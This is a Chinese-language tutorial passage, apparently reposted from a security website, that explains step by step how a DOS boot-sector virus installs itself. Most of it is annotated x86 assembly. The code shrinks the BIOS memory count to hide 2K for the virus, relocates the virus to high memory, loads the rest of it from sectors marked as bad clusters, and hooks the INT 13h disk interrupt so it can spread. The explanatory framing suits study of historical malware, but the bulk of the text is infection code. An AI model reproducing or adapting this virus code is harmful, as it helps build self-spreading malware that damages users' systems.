a. 减少dos可用最大内存量,以供己需;如:
xor ax,ax
mov ss,ax
mov sp,7c00h
mov ds,ax
mov ax,word ptr ds:[413h] ; here store largest mem 0000:0413
sub ax,2 ; apply 2k mem for virus
mov ds:[413h],ax
b. 修改必要的中断向量,以便传播;
c. 读入病毒的其它部分,进行病毒的拼装(在内存高端);
先从已标记的簇中某扇区读入病毒的其他部分,这些簇往往被标记为坏簇,(但是文件型病毒则不必如此,二者混合型亦然)然后再读入原引导记录到0000:7c00h,跳转执行。代码如下:
mov cl,06h
shl ax,cl ; ax = 8F80
add ax,0840h ; ax = 97c0
mov es,ax
mov si,7c00h ; si = 7c00
mov di,si
mov cx,0100h
repz movsw ; 将病毒移到高端.
v2: push ax
pop ds
push ax
mov bx,7c4bh
push bx
ret ; 指令执行转入高端内存
call v3
v3: xor ah,ah ; ah=0
int 13h
mov ah,80h
and byte ptr ds:[7df8h],al
v4: mov bx,word ptr ds:[7df9h] ; 读入病毒的其他部分.
push cs
pop ax ; ax=97c0
sub ax,20h ; ax=97a0
mov es,ax ; es=97a0
call v9
mov bx,word ptr ds:[7df9h] ; load logic sector id
inc bx ; bx++ , is boot sector
mov ax,0ffc0h ; ffc0:8000 = 0000:7c00 读入原引导分区内容.
mov es,ax
call v9
xor ax,ax ; AX=0
mov byte ptr ds:[7df7h],al ; flag = 0
v5: mov ds,ax ; ds=0
mov ax,word ptr ds:[4ch] ;
mov bx,word ptr ds:[4eh] ; 修改中断向量.
mov word ptr ds:[4ch],7cd6h
mov word ptr ds:[4eh],cs ; now int13h had been changed
push cs
pop ds ; ds=cs
mov word ptr ds:[7d30h],ax ; save original int13 vector
mov word ptr ds:[7d32h],bx ;
v6: mov dl,byte ptr ds:[7df8h] ; load drive letter
v7:
;=======================================================
; jmp 0000:7c00 ; here is a jump
db 0eah,00h,7ch,00h,00h 这里是个跳转指令的二进制代码.
;=======================================================
d. 读入原主引导分区,转去执行dos的引导工作。
转载地址:http://www.netsp.com.cn/Article/netsafe/virus/200607/20060721201251.html
